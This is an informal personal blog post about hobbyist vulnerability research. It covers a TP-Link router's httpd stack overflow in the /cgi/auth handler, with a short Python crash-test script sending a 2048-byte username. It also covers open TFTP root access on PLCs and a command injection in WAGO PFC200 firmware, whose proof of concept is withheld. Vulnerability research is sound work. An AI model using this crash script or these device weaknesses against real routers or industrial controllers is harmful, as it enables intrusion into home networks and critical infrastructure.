Mi0r4sora

fun life is better than every money vulnerability research just for fun

If someone asks me what do you think about air gap networks, I will answer that this is a very good way to increase network security. But if they say that it cannot be hacked at all, I will show them this sample and articles along with the source code.

an example struct to get am 1580 khz frequency from bus cpu to dest with that structure and use the time palse of cpu to send it over the airgapped network.

hmm we can do these with some function like the hostgetclock_service

One day when I was really bored, I told my friends to send me the models and types of routers and iot devices they have so that I can send them an example of vulnerabilities. In the meantime, they said the name of this device is tp-link

In the first part, I went to /etc to check the entries so that I can get through it the type of input data of the interfaces and things like this. The best parts that are really interesting for us to develop the exploit are ppp and pppoe and also l2tp and so on. http are for this part In this part I went to httpd which is a custom web server to start with

Cosmic radiation

In the above image, I saw io, which is the input and output controller, which is referenced to several functions that you see

Cosmic radiation

The function searches for different paths and returns 404 if there is none

Cosmic radiation

the interesting route

The input is parsed from the http header side on the

Cosmic radiation

vulnerable function: httprpmauth_main

vulnerability : if (param1[0xd] == 1) { pcVar3 = “adminName=%s\nadminPwd=%s\n”; } else { pcVar3 = “userName=%s\nuserPwd=%s\n”; } sprintf(acStack1fbc,pcVar3); iVar1 = rdpsetObj(0,“USERCFG”,&local1fec,acStack1fbc,2);

these one is realte show me get header requests parameters and copy it to stack with sprintf after that i nee know which route get input to it so i guss maybe these function xref to him route

httpaliasaddEntryByArg(2,“/cgi/auth”,(char *)0x0,(int)httprpmauthmain,ghttpauthordefault); the param1 is int i dont have any idea what these do so i need analyse these function param2 is route param3 is 0x0 param4 call the function to get parameters of header requests param_5 may be these is an default parameter set by device

so in these route we can use these parameters of http header to get overflow?

import requests headers = {“Host”: “192.168.0.1”, “User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “/”,“Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”,“Content-Type”: “text/plain”, “Content-Length”: “78”,“Origin”: “http://192.168.0.1", “Connection”: “close”, “Referer”: “http://192.168.0.1/"}

may be these payload = “a” * 2048 formdata = “[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,userName={}nuserPwd=1231313”.format(payload) url = “http://192.168.0.1/cgi?8" response = requests.post(url, data=formdata, headers=headers) print response.text

if doesn't work change the parameters to true one of them and test it to get crash so we can exploit it like that

i guss some day i wanna research about the some plc devices and i see these device on the shodan hmmm... i dont know anything about it soooo i download the software and firmware from site and start research hmm

and i see these Cosmic radiation

the tftp port on it is default open why? hmm so i check these on the some critical devices and i see these bruh we can access the root on these

and we can access to device after i see that i think to my self i have zero day ? but to day i see these vulnerability be patched as these cve CVE-2019–9201

these vulnerability like the shell access port open without any credentials :/

to day i explain how we can exploit the command injection vulnerability in wago pfc200 firmware.

the command injection is vulnerability to allow attacker  to output its own commands at the device and access to it.

vulnerability is  on these directory: pfc200/var/www/wbm/php

and filename is :session_lifetime.inc.php

these function sent request is responsible for checking the username parameter in the ID session each time PHPSESS .

we cant injecting the command on the session just we need the check these function where be use on the web server and inject our own command for fun :)

Cosmic radiation

In order to give them a little more time, I will not publish this yet (i talk about poc and other stuff like that)

so these is realy shity command injection on these function :/

why you use these ?

I have reported it but still no response after 1 week also i have 2 other vulnerability on the iocheckd service but i dont like to report it

these is wan side vulnerability and these device is use realy critical infrastructure